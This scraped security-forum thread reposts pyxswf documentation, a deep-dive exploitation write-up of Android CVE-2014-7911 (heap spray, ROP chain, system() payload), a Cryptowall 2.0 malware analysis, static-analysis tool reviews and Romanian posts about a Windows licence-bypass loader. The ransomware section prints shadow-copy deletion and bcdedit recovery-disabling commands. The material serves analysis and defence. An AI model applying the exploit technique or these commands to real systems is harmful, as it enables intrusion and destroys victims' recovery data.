    pyxswf pyxswf is a script to detect, extract and analyze Flash objects (SWF files) that may be embedded in files such as MS Office documents (e.g. Word, Excel), which is especially useful for malware analysis. It is part of the python-oletools package. pyxswf is an extension to xxxswf.py published by Alexander Hanel. Compared to xxxswf, it can extract streams from MS Office documents by parsing their OLE structure properly, which is necessary when streams are fragmented. Stream fragmentation is a known obfuscation technique, as explained on Ixia It can also extract Flash objects from RTF documents, by parsing embedded objects encoded in hexadecimal format (-f option). For this, simply add the -o option to work on OLE streams rather than raw files, or the -f option to work on RTF files. Usage Usage: pyxswf.py [options] <file.bad> Options: -o, --ole Parse an OLE file (e.g. Word, Excel) to look for SWF in each stream -f, --rtf Parse an RTF file to look for SWF in each embedded object -x, --extract Extracts the embedded SWF(s), names it MD5HASH.swf & saves it in the working dir. No addition args needed -h, --help show this help message and exit -y, --yara Scans the SWF(s) with yara. If the SWF(s) is compressed it will be deflated. No addition args needed -s, --md5scan Scans the SWF(s) for MD5 signatures. Please see func checkMD5 to define hashes. No addition args needed -H, --header Displays the SWFs file header. No addition args needed -d, --decompress Deflates compressed SWFS(s) -r PATH, --recdir=PATH Will recursively scan a directory for files that contain SWFs. Must provide path in quotes -c, --compress Compresses the SWF using Zlib Example 1 - detecting and extracting a SWF file from a Word document on Windows: C:\oletools>pyxswf.py -o word_flash.doc OLE stream: 'Contents' [sUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents [ADDR] SWF 1 at 0x8 - FWS Header C:\oletools>pyxswf.py -xo word_flash.doc OLE stream: 'Contents' [sUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents [ADDR] SWF 1 at 0x8 - FWS Header [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf Example 2 - detecting and extracting a SWF file from a RTF document on Windows: C:\oletools>pyxswf.py -xf "rtf_flash.rtf" RTF embedded object size 1498557 at index 000036DD [sUMMARY] 1 SWF(s) in MD5:46a110548007e04f4043785ac4184558:RTF_embedded_object_0 00036DD [ADDR] SWF 1 at 0xc40 - FWS Header [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf How to use pyxswf in Python applications TODO python-oletools documentation Home License Install Contribute, Suggest Improvements or Report Issues Tools: olebrowse oleid olemeta oletimes olevba pyxswf rtfobj Sursa: https://bitbucket.org/decalage/oletools/wiki/pyxswf
      • 1
      • Upvote
  8. CVE-2014-7911 – A Deep Dive Analysis of Android System Service Vulnerability and Exploitation posted by: Yaron Lavi and Nadav Markus on January 6, 2015 6:00 AM In this post we discuss CVE-2014-7911 and the various techniques that can be used to achieve privilege escalation. We also examine how some of these techniques can be blocked using several security mechanisms. The Vulnerability CVE-2014-7911 was presented here along with a very descriptive POC that was written by Jann Horn. Described briefly, the ObjectInputStream doesn’t validate that the serialized object’s class type, as described in the serialized object, is actually serializable. It creates an instance of the wanted class anyway with the deserialized values of the object. Therefore, one can create object of any class, and control its private variables, by serializing objects from another class, that would be deserialized as data members of the wanted class. Let’s look at the example below: The following snippet (copied from the original POC) shows a spoofed BinderProxy instance: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 6 7 8 9 [/TD] [TD=class: crayon-code]package AAdroid.os; import java.io.Serializable; public class BinderProxy implements Serializable { private static final long serialVersionUID = 0; public long mObject = 0x1337beef; public long mOrgue = 0x1337beef; }[/TD] [/TR] [/TABLE] In the POC code that was provided above, an attacker serializes a class named AAdroid.os.BinderProxy and changes its name to android.os.BinderProxy after marshalling it, and before sending it to the system server. android.os.BinderProxy class isn’t serializable, and it involves native code that handles mObject and mOrgue as pointers. If it was serializable, then the pointers valued wouldn’t be deserialized, but their dereferenced values would. The deserialization code in ObjectInputStream deserializes the sent object as an android.os.BinderProxy instance, leading to type confusion. As mentioned earlier, this type confusion results in the native code reading pointer values from the attacker’s spoofed android.os.BinderProxy, supposedly private fields, which the attacker modified. Specifically, the field of interest is mOrgue. The android.os.BinderProxy contains a finalize method that will result in native code invocation. This native code uses mOrgue as a pointer. This is the finalize method: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 6 7 8 9 [/TD] [TD=class: crayon-code]protected void finalize() throws Throwable { destroy(); super.finalize(); return; Exception exception; exception; super.finalize(); throw exception; }[/TD] [/TR] [/TABLE] And this is the declaration of destroy: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]private final native void destroy();[/TD] [/TR] [/TABLE] The native destroy function: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 6 7 8 9 10 11 12 13 [/TD] [TD=class: crayon-code]static void android_os_BinderProxy_destroy(JNIEnv* env, jobject obj) { IBinder* b = (IBinder*) env->GetIntField(obj, gBinderProxyOffsets.mObject); DeathRecipientList* drl = (DeathRecipientList*) env->GetIntField(obj, gBinderProxyOffsets.mOrgue); LOGDEATH("Destroying BinderProxy %p: binder=%p drl=%p\n", obj, b, drl); env->SetIntField(obj, gBinderProxyOffsets.mObject, 0); env->SetIntField(obj, gBinderProxyOffsets.mOrgue, 0); drl->decStrong((void*)javaObjectForIBinder); b->decStrong((void*)javaObjectForIBinder); IPCThreadState::self()->flushCommands(); }[/TD] [/TR] [/TABLE] Eventually, the native code invokes decStrong (i.e., in drl->decStrong((void*)javaObjectForIBinder) Note that at this point, drl is controlled by an attacker, as evident by the line [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 [/TD] [TD=class: crayon-code]DeathRecipientList* drl = (DeathRecipientList*) env->GetIntField(obj, gBinderProxyOffsets.mOrgue);[/TD] [/TR] [/TABLE] So decStrong is going to be called with us controlling ‘this’ pointer. Let’s take a look on decStrong code from RefBase class source: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 [/TD] [TD=class: crayon-code]void RefBase::decStrong(const void* id) const { weakref_impl* const refs = mRefs; refs->removeStrongRef(id); const int32_t c = android_atomic_dec(&refs->mStrong); #if PRINT_REFS ALOGD("decStrong of %p from %p: cnt=%d\n", this, id, c); #endif ALOG_ASSERT(c >= 1, "decStrong() called on %p too many times", refs); if (c == 1) { refs->mBase->onLastStrongRef(id); if ((refs->mFlags&OBJECT_LIFETIME_MASK) == OBJECT_LIFETIME_STRONG) { delete this; } } refs->decWeak(id); }[/TD] [/TR] [/TABLE] Note the line refs->mBase->onLastStrongRef(id); These lines will eventually lead to arbitrary code execution. In the following screenshot of RefBase::decStrong assembly, the attacker controls r0(‘this pointer’) Exploitation The first use of the controlled register r0, which contains the ‘this’ pointer (drl) is in these lines: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 [/TD] [TD=class: crayon-code]weakref_impl* const refs = mRefs; refs->removeStrongRef(id); const int32_t c = android_atomic_dec(&refs->mStrong);[/TD] [/TR] [/TABLE] These lines are translated to the following assembly: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 [/TD] [TD=class: crayon-code]ldr r4, [r0, #4] # attacker controls r4 mov r6, r1 mov r0, r4 blx <android_atomic_dec ()>[/TD] [/TR] [/TABLE] First, r4 is loaded with the mRefs variable. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]ldr r4, [r0, #4] # attacker controls r4[/TD] [/TR] [/TABLE] Note that r0 is the ‘this’ pointer of the drl, and mRefs is the first private variable following the virtual function table, hence it is 4 bytes after ‘this’ pointer. Then, android_atomic_dec is being called with &refs->mStrong [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code] const int32_t c = android_atomic_dec(&refs->mStrong);[/TD] [/TR] [/TABLE] This is translated to: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 [/TD] [TD=class: crayon-code]mov r0, r4 blx <android_atomic_dec ()>[/TD] [/TR] [/TABLE] r0 now contains &refs->mStrong. Note that the mStrong variable is the first data member of refs (in the class weakref_impl), and that this class contains no virtual functions, hence it does not contain a vtable, so the mStrong variable is at offset 0 of r4. As one can tell – the line refs->removeStrongRef(id); is not present in the assembly simply because the compiler optimized and omitted it, since it has an empty implementation, as one can see from the following code: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]void removeStrongRef(const void* /*id*/) { }[/TD] [/TR] [/TABLE] Following the call to android_atomic_dec are these lines of code: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 [/TD] [TD=class: crayon-code]if (c == 1) { refs->mBase->onLastStrongRef(id);[/TD] [/TR] [/TABLE] These are translated to the following assembly lines: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 6 7 [/TD] [TD=class: crayon-code]cmp r0, #1 bne.n d1ea ldr r0, [r4, #8] mov r1, r6 ldr r3, [r0, #0] ldr r2, [r3, #12] blx r2 [/TD] [/TR] [/TABLE] Note that android_atomic_dec returns the value of the specified memory address before the decrement took place. So in order to invoke refs->mBase->onLastStrongRef(id) (blx r2), we must get refs->mStrong to get the value of 1. As we can see up to now, an attacker has several constraints that he must adhere to if he wishes to gain code execution: drl (our first controlled pointer, i.e. r0 when entering decStrong) must point to a readable memory location. refs->mStrong must have the value of 1 The dereference chain at the line refs->mBase->onLastStrongRef(id) must succeed and eventually point to an executable address. In addition, an attacker must overcome the usual obstacles of exploitation – ASLR and DEP. One can employ basic techniques to fulfill these requirements and overcome the mentioned security mechanisms, including heap spraying, stack pivoting and ROP. Let’s look at these in detail. Heap spray An attacker’s first step will be to get a reliable readable address with arbitrary data – most commonly achieved by a heap spray. The system server provides several core functionalities for the android device, many of which are exposed to applications via various service interfaces. A common paradigm to invoke a service in the context of the system server is like the following: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]LocationManager lm = (LocationManager)getSystemService(LOCATION_SERVICE);[/TD] [/TR] [/TABLE] The acquired manager allows us to invoke functionality in the system server on behalf of us, via IPC. Several services can be used by us for a heap spray, but for the purpose of this blog, we decided to use a heap spray that requires special app permissions, to prevent normal applications from utilizing this technique. The location manager allows us to register test providers via the function addTestProvider – allowing us to pass an arbitrary name that contains arbitrary data. As we mentioned, one should enable developer options and enable the mock locations option in order to utilize this. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]lm.addTestProvider(builder.toString(), false, false, false, false, false, false, false, 1, 1);[/TD] [/TR] [/TABLE] Note that this heap spray does have its limitations – the data is sprayed using the name field, which is Unicode. This imposes a limitation – we are limited to byte sequences which correspond to valid Unicode code points. Spray addresses manipulation After spraying the system server process memory address space, we encountered another issue – our chosen static address indeed pointed to readable data on each run, but not to the exact same offset in the spray chunk each time. We decided to solve this problem by crafting a special spray that contains decreasing pointer values. Here is an illustration of the sprayed buffer, followed by an explanation of its structure: STATIC_ADDRESS is the arbitrarily chosen static pointer in mOrgue. GADGET_BUFFER_OFFSET is the offset of GADGET_BUFFER from the beginning of the spray. In each run of system server process, the static address we chose points to our controlled data, but with different offsets. r0 (which always hold the same chosen STATIC_ADDRESS) can fall to any offset in the “Relative Address Chunk”, therefore point to any of the STATIC_ADDRESS + GADGET_BUFFER_OFFSET – 4N addresses, on each time. Note the following equation: GADGET_BUFFER = Beginning_of_spray + GADGET_BUFFER_OFFSET In the case that r0 (=STATIC_ADDRESS) points to the beginning of the spray : STATIC_ADDRESS = Beginning_of_spray. Hence: GADGET_BUFFER = STATIC_ADDRESS + GADGET_BUFFER_OFFSET On any other case – r0(=STATIC_ADDRESS) points to an offset inside the spray (the offset is dword aligned): STATIC_ADDRESS = Beginning_of_spray + 4N Beginning_of_spray = STATIC_ADDRESS – 4N. Hence: GADGET_BUFFER = STATIC_ADDRESS + GADGET_BUFFER_OFFSET – 4N The higher offset in the chunk that r0(=STATIC_ADDRESS) points to, the more we have to subtract to make the expression: STATIC_ADDRESS + GADGET_BUFFER_OFFSET – 4N points to GADGET_BUFFER. No matter to which offset in the chunk r0 points to, dereference it would give us the current address of GADGET_BUFFER. But where do we get if we dereference the other addresses in the chunk? As farther as we go above r0, the farther the dereference would bring us below GADGET_BUFFER. Now that we have a valid working spray, let’s go back to analyzing the assembly. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 [/TD] [TD=class: crayon-code]ldr r4, [r0, #4] mov r0, r4 blx <android_atomic_dec ()> cmp r0, #1[/TD] [/TR] [/TABLE] So to overcome the second constraint – in which refs->mStrong must contain 1 [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]ldr r4, [r0, #4] --> r4=[sTATIC_ADDRESS + 4] --> r4 = GADGET_BUFFER-4[/TD] [/TR] [/TABLE] [r4] should contain 1, hence [GADGET_BUFFER – 4] should contains 1. Now, after atomic_dec return value is indeed 1, we should overcome the other dereferences to get to the blx opcode. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 6 7 8 9 [/TD] [TD=class: crayon-code]cmp r0, #1 bne.n d1ea r4=GADGET_BUFFER - 4 ldr r0, [r4, #8] r0 = [GADGET_BUFFER - 4 + 8] <-> r0 = [GADGET_BUFFER + 4] mov r1, r6 ldr r3, [r0, #0] r3 = [[GADGET_BUFFER + 4] + 0] <-> r3 = [[GADGET_BUFFER + 4]][/TD] [/TR] [/TABLE] Note in order to succeed with this dereference, [GADGET_BUFFER + 4] should contain a KNOWN valid address. We arbitrarily chose the known address – STATIC_ADDRESS. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 [/TD] [TD=class: crayon-code]ldr r2, [r3, #12] r2 = [GADGET_BUFFER + 12] blx r2[/TD] [/TR] [/TABLE] So now we can build the GADGET_BUFFER as following: ROP CHAIN We chose to run the “system” function with a predefined command line. In order to control the r0 register, and make it point to the command line string, we should use some gadgets that would manipulate the registers. We got only one function call, so to take control on the execution flow with our gadgets, we should use a stack pivot gadget. Therefore, the first function pointer is the preparations for the stack pivot gadget: Where r5 equals to the original r0 (STATIC_ADDRESS) as one can see at the beginning of decStrong. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 6 7 8 [/TD] [TD=class: crayon-code]mov r0,r5 - Restoring r0 to its original value. ldr r7, [r5] r7 = [r5] r7=[sTATIC_ADDRESS] r7 = GADGET_BUFFER ldr r2, [r7,#0x54] r2 = [r7 + 0x54] r2 = [GADGET_BUFFER + 84] blx r2[/TD] [/TR] [/TABLE] Call to the next gadget – which should be 21(=0x54 / 4) dwords from the beginning of GADGET_BUFFER This gadget does the Stack Pivoting. SP register points to r7 – therefore the stack is under our control and points to GADGET_BUFFER. Ret to the next gadget that should be kept 8 dwords from the beginning of GADGET_BUFFER (Note the pop {r4-r11,pc} instruction, which pops 8 registers off the stack before popping pc). [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]r0 = [r0 + 0x38] r0 = GADGET_BUFFER - 0x38 (As explained before about the spray)[/TD] [/TR] [/TABLE] Now r0 points to 56 (0x38) bytes before GADGET_BUFFER, so we have 52 command line chars, excluding the “1” for atomic_dec. Ret to the next gadget that should be kept 10 dwords from the beginning of GADGET_BUFFER (2 dwords after the current gadget – pop {r3,pc}) That is the last gadget where we call system! Here is an updated layout of the memory for this to happen: Android and ARM There are two important issues we should keep in mind when choosing the gadgets addresses. There is an ASLR mechanism on Android, and the addresses wouldn’t be the same on each and every time. In order to know the correct address, we use the fact that both system server process, and our app are forked from the same process – ZYGOTE, meaning we share the same modules. So we get the address of the necessary modules in system server process, by parsing the maps file of our process. ‘maps’ is a file in /proc/<pid>/maps which contains the memory layout and the loaded modules addresses. On ARM CPU, there are two modes of opcode parsing: ARM (4 bytes per opcode) and THUMB (variable bytes per opcode – 2 or 4). Meaning that the same address pointed by PC, could be parsed differently by the cpu when running in different modes. Parts of the gadgets we use are in the THUMB mode. In order to make the processor change its mode when parsing those gadgets, we change the pointer address from the actual address, to (address & 1) – turning on the LSB, which make the cpu jmp to the correct address with THUMB mode. PAYLOAD As described before, we use the “system” function to run our command line. The length of the command line is limited, and actually a command line can’t be used for every purpose. So we decided to use a pre compiled elf, that being written to the file system, as an asset of our app. This elf can do anything with uid 1000 (the uid of system server). The command line we send as an argument to system is simply – “sh -c ” + file_path CONCLUSION Android has some common security mechanisms such as ASLR and DEP which should make an exploitation of vulnerability harder to achieve. Moreover, every application runs in its own process, so the IPC communication could be validated, and making guesses on memory layout shouldn’t be intuitive. On the other hand, the fact that every process is forked from the same process makes ASLR irrelevant for vulnerabilities within zygote’s sons and the binder connection from every process to system server could lead to heap spray as seen on this post. Those issues appear to be inherent in the Android OS design. Palo Alto Networks has been researching an Android security solution that based on our lab testing would have blocked this exploit (as well as other exploits) with multiple exploit mitigation modules. We hope to share more details in the coming months. Sursa: CVE-2014-7911 – A Deep Dive Analysis of Android System Service Vulnerability and Exploitation - Palo Alto Networks BlogPalo Alto Networks Blog
  9. Ransomware on Steroids: Cryptowall 2.0 Talos Group | January 6, 2015 at 7:14 am PST This post was authored by Andrea Allievi and Earl Carter. Ransomware holds a user’s data hostage. The latest ransomware variants encrypt the user’s data, thus making it unusable until a ransom is paid to retrieve the decryption key. The latest Cryptowall 2.0, utilizes TOR to obfuscate the command and control channel. The dropper utilizes multiple exploits to gain initial access and incorporates anti-vm and anti-emulation checks to hamper identification via sandboxes. The dropper and downloaded Cryptowall binary actually incorporate multiple levels of encryption. One of the most interesting aspects of this malware sample, however, is its capability to run 64 bit code directly from its 32 bit dropper. Under the Windows 32-bit on Windows 64-bit (WOW64) environment, it is indeed able to switch the processor execution context from 32 bit to 64 bit. Initial Compromise Cryptowall 2.0 can be delivered through multiple attack vectors, including email attachments, malicious pdf files and even various exploit kits. In the sample that we analyzed, the dropper utilized CVE-2013-3660, “Win32k.sys Elevation of Privilege Vulnerability” to achieve the initial privilege escalation on X86 based machines. This exploit works on 32 bit OSs starting beginning with Vista. The dropper even includes a 64-bit DLL that is able to trigger the exploit in all the vulnerable AMD64 Windows Systems. Provided the anti-VM and anti-emulation checks pass, the Cryptowall malware is decrypted and installed on the system. Once the system is infected, the user is presented a message similar to Figure 1. Figure 1. (Click to Enlarge) Constructing the Unencrypted Cryptowall Binary To construct the unencrypted Cryptowall 2.0 code, the dropper goes through multiple stages of decryption. The main dropper is a C++ MFC application. The first-stage decryption code is located at “CMainFrame::OnCreate” in the MFC event handler. The handler builds the first-stage decryption code (at RVA +0xF3F0) and simple calls it. The first-stage decryption code opens the original dropper PE, reads from it, and decrypts a big chunk of code (second-stage). Finally it transfer the execution to the second-stage located in the external buffer. The Second stage is the last encryption layer code. It builds a simple Import Address Table (IAT), and implements multiple features. The most important one is the Anti-VM Check. The Anti-VM code is quite simple: Figure 2: The CryptoWall simple Anti-VM check code. (Click to Enlarge.) If no VM is detected, another “dropper“ process is spawned in a suspended state. The “ZwUnmapViewOfSection” API is used to unmap the original PE buffer. A new memory chunk is allocated and a new PE (extracted and decrypted from the “.data” section) is copied into its preferred base address. Then a new thread process is resumed with the following new context and the original process terminates: EAX register is set to the new PE entry point address; EBX register is set to a still unknown value: 7ffd8008 Installing Cryptowall on System The “VirusExplorerMain” routine in the faked “explorer” process constructs the IAT and installs CryptoWall on the victim system. The first step is to create an executable with the name based on the computer’s MD5 hash. This executable is copied to the location specified by the “%APPDATA%” environment variable (“C:\Users\<Username>\AppData\Roaming”). To maintain persistence, an auto-start registry value is added in: HKCU\Software\Microsoft\Windows\CurrentVersion\Run HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Note: The RunOnce value is preceded by a so that the process starts even in Safe Mode. The same random executable is copied to the “Startup” folder of the Start Menu. The last duty of the faked “explorer” process is to disable all system protections. The following shell commands are executed: vssadmin.exe Delete Shadows /All /Quiet bcdedit.exe /set {default} recoveryenabled No bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures The following services are also disabled: Security Center, Windows Defender, Windows Update, Background Intelligent Transfer Service, ERSvc, Windows Error Reporting Service. Finally, the original dropper file is terminated and the file is deleted. The Cryptowall PE is now injected into a faked “Svchost” process in the same way as the fake “explorer” process was created initially. The infection now continues in the faked “svchost” process. The “VirusSvchostMain” function (RVA 0x418C70) is the main infection routine. It constructs the virus IAT (importing functions from the following modules: ntdll, kernel32, advapi32, user32, wininet, ole32, gdi32), checks whether the installation is done, and creates the main Cryptowall event. It then creates the main Cryptowall Thread and tries to download the TOR client used for communication from one of the following URLs: If it succeeds in downloading the update file, it executes directly. The downloaded binary is an executable that is encrypted 3 times with a simple algorithm. After decryption, a clean PE file is extracted and launched. This PE file is peculiar because it has all its normal headers (DOS header, NT header, IAT, EAT, …) stripped. Its IAT and “.data” section reside in another big memory buffer. The decryption code deals with the correct linking and relocation. This clean PE is actually the Cryptowall TOR communication module. It implements a complete TOR Client that it utilizes for Command & Control communication. The TOR URLs used by the sample we analyzed were: crptarv4hcu24ijv.onion crptbfoi5i54ubez.onion crptcj7wd4oaafdl.onion Using hardcoded IP address in the PE, the malware connects to the TOR Server with an encrypted SSL connection on port 443 or 9090. After successfully connecting, it starts to generate the Cryptowall domain names using a customized Domain Generation Algorithm (DGA). The algorithm is located at offset + 0x2E9FC. Figure 3: The code of the DGA algorithm in the TOR client If the encrypted connection goes well, the communication with the Cryptowall Command & Control server will take places; otherwise the main thread sleeps for a random number of seconds and then retries with a new generated server name. Each of the many SSL connections Cryptowall 2.0 establishes uses random server names in the certificates. However, the client certificates share commonalities that are unique enough to make it possible to detect these client connections outbound. Cryptowall 2.0 makes many, many requests once installed. Initially Cryptowall 2.0 attempts to idenitfy the outside address for the network the system is operating on using the “GetExternalIpAddr” function. It accomplishes this by communicating with one of the following addresses: http://wtfismyip.com/text http://ip-addr.es http://myexternalip.com/raw http://curlmyip.com It starts with wtfismyip.com and stops after the first successful reply is received. In most situations, this means that it will end up only going to wtfismyip.com (since it is the first entry in the list). Although this is a fairly generic request, this shouldn’t be a very common occurrence in an enterprise network and can serve as a potential network indicator of this malware. Another interesting aspect of the sample that we analyzed is that includes some 64 bit code (and an exploit DLL) directly in its main 32-bit executable. Although the main module is running in 32-bit mode, it is capable of executing all the 64-bit functions it needs. It accomplishes this by performing a direct Processor execution context switch. The code pushes two 32-bit values on the stack: the target offset (only the low part) of the 64-bit function offset and a 64-bit selector. push <32Bit Selector> push <32Bit Low DWORD address> retf It finally performs a FAR RET (opcode 0xCB). As the Intel manuals say, this kind of opcode executes a “Far return”: a return to a calling procedure located in a different segment than the current code segment. The target code segment is a 64-bit one, and as result the processor switches the execution context. To return to 32-bit mode the code reverses this process: call $+5 ; This will push the 64-bit return address on the stack mov dword ptr [esp+4], <32Bit Selector> ; The same as PUSH <32bit value>, keep in mind mov dword ptr [esp], <32Bit Address> ; that all values are 8 byte wide in AMD64 mode retf This mixing between 64-bit code and the 32-bit main executable is even difficult for IDA to disassemble. FIgure 2 shows a dump of a Windows 7/8 64 bit Global Descriptor Table (GDT): Figure 4: A dump of the Global Descriptor Table of a 64-bit System As the reader can see, the descriptor 0x20 and the descriptor 0x30 are the Ring 3 code segments that describe the entire user-mode address space, one for 32 bit and one for 64 bit. Cryptowall utilizes the proper selectors for these two segment descriptors and switches between these the two execution modes during its operation. We were able to reverse this process and reconstruct the assembly language code (shown in Figure 3) that performs this switching between 32 & 64 bit by pushing the correct value before executing the far return instruction. Figure 5: Switching Between 32 & 64 bit Modes. (Click to Enlarge) Summary Ransomware is a growing threat to computer users. Variants continue to evolve in functionality and evasive capability. Just getting these complex samples to run in a sandbox can be challenging, making analysis more complicated and involved. Constant research is necessary to develop updated signatures and rules to combat these constant attacks. Identifying and stopping these new complex variants requires a layered security approach. Breaking any step in the attack chain will successfully prevent this attack. Therefore, blocking the initial phishing emails, blocking network connections to known malicious content, as well as stopping malicious process activity are critical to combating ransomware and preventing it from holding your data hostage. Protecting Users Against These Threats Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. CWS or WSA web scanning prevents access to malicious websites, including the downloading of the malware downloaded during these attacks. The Network Security protection of IPS and NGFW have up-to-date signatures to detect malicious network activity by threat actors. ESA can block phishing emails sent by threat actors as part of this attack. Sursa: Ransomware on Steroids: Cryptowall 2.0
  10. E perfect, exact ce aveai nevoie. Cat ai dat pe el? Mai mult de 200?
  11. Uploadeaza undeva soft-ul si da-ne link. O sa ma uit putin peste el, dar nu promit nimic. Nu ai gasit nimic interesant: https://www.google.ro/search?q=c%2B%2B+magnetic+stripe+reader+usb&ie=utf-8&oe=utf-8&gws_rd=cr ?
  12. MSR Reader-ul ala nu are si o aplicatie ceva? De facut, daca nu are documentatie, o sa fie greu. Daca e conectat pe USB, cauta un USB sniffer. Daca e pe port serial, un serial sniffer, ar trebui sa existe. Vezi ce pachete se trimit/primesc si poate iti dai seama cum functioneaza, cel putin partial. Edit: Am gasit asta: http://www.cardcolor.ro/cititoare/encoder-magnetic-msr-606 1x Encoder magnetic MSR606 1x CD(Manual utilizare, Driver USB, Software encodare) 1x A/C Adapter(100-240V, with plug for worldwide use: US, AU, UK or Europe) 1x Card curatare Cel mai probabil acel soft e pentru Windows si nu e open source. Vad ca e nevoie de un driver, sper sa nu ai probleme din cauza asta. Poti incerca sa faci reverse engineering la un nivel minimal, nu stiu... Daca ai noroc si e scris in .NET si neobfuscat, te-ai scos. Oricum, limbajul in care faci programul e irelevant, poate sa fie orice. Si ca tot veni vorba, ce vrei sa faci cu el mai exact?
  13. NU luati de pe site-uri ca: download.windows7loadernew.com , download.windowsloaderdaz.com , dazloader.com ! Eu am folosit acasa: Zippyshare.com - Windows Loader v2 2 2 by Daz.zip Virustotal: https://www.virustotal.com/en/file/2f2aba1e074f5f4baa08b524875461889f8f04d4ffc43972ac212e286022ab94/analysis/1420535361/ (detectat ca HackTool, Crack, Keygen) Recomand totusi SURSA, cum a mentionat spider: Windows Loader - Support and chat - Page 1886 Nota: Instalati loader inainte de a instala antivirus, desi va supuneti la riscuri. Scanati pe virustotal. Daca instalati mai intai antivirus, va puteti alege cu MBR (master boot record) corupt si nu mai puteti boota.
  14. Aveti grija de unde descarcati Windows 7 Loader, eu am gasit si versiune cu Adware...
  15. This tool, developed in 2010 by Justin Collins (@presidentbeef) is specifically for finding vulnerabilities and security issues in Ruby on Rails apps at any development stage. Brakeman is used by the likes of Twitter (where Justin is employed), GitHub, and Groupon to look for vulnerabilities. Justin gave a talk at RailsConf 2012 that’s worth watching describing the value of using SCA early on and how Brakeman accomplishes that. The Good: Easy setup and configuration and fast scans. Because it’s specifically built for Ruby on Rails apps, it does a great job at checking configuration settings for best practices. With the ability to check only certain subsets, each code analysis is able to be customizable to specific issues. The developer has been maintaining and updating the tool on a regular basis since its first release. The Not-So-Good: Because of its suspicious nature, the tool can show a high rate of false positives As written on the tool’s FAQ page, just because a report shows zero warnings doesn’t mean your application is flaw-free; “There may be vulnerabilities Brakeman does not test for or did not discover. No security tool has 100% coverage.” Sursa: Brakeman - Rails Security Scanner
      • 1
      • Upvote
  16. This tool, available under a GNU General Public License, was developed to check non-standard code that compilers would normally not detect. Created by Daniel Marjamäki, CPPCheck offers a command line mode as well as a GUI mode and has a number of possibilities for environment integration. The Good: Plugins and integrations for a number of IDEs: Eclipse, Hudson, Jenkins, Visual Studio. Daniel’s plan is to release a new version every other month or so, and he’s been keeping up with that goal. Available in many world languages, including English, Dutch, Finnish, Swedish, German, Russian, Serbian and Japanese. The Not-As-Good: Doesn’t detect a large number of bugs (as with most of the other tools) Customization requires good deal of effort Results take longer than other tools Sursa: cppcheck | SourceForge.net
  17. Designed to be simple and easy to use, FlawFinder reports well-known security issues in applications written in C, sorted by risk level. Developed by open-source and secure software expert David Wheeler, the tool itself is written in Python and uses a command line interface. FlawFinder is officially CWE compatible. The Good: Ability to check only the changes made to code for faster, more accurate results Long history, released in 2001 with consistent updates The Not-As-Good: A number of false positives Requires Python 1.5 Sursa: Flawfinder Home Page
  18. Created by ethical hacker Ryan Dewhurst (@ethicalhack3r) for his undergraduate thesis, DevBug is a very simple online PHP static code analysis tool. Written in JavaScript, it was designed to make SCA easy and pulls inspiration (as well as Taint Analysis data) from RIPS. The Good: Easy to use with instant results Nice use of OWASP wiki page links for more info on any found vulnerability The Not-As-Good: Simplistic and is only meant for light analysis Sursa: http://www.devbug.co.uk/
  19. he tool, which names stands for Lightweight Analysis for Program Security in Eclipse, is an OWASP security scanner, developed as an Eclipse plugin, which detects vulnerabilities in Java EE Applications. LAPSE+ is liscenced under the GNU General Public License v.3 and was originally developed by Stanford University. The Good: Tests validation logic without compiling your code Offers results as three steps: Vulnerability Source, Vulnerability Sink and Provenance Tracker The Not-As-Good: Doesn’t identify compilation errors Limited to Eclipse IDE’s only Project was taken over in early 2014 but no new version since 2012 Sursa: https://www.owasp.org/index.php/OWASP_LAPSE_Project
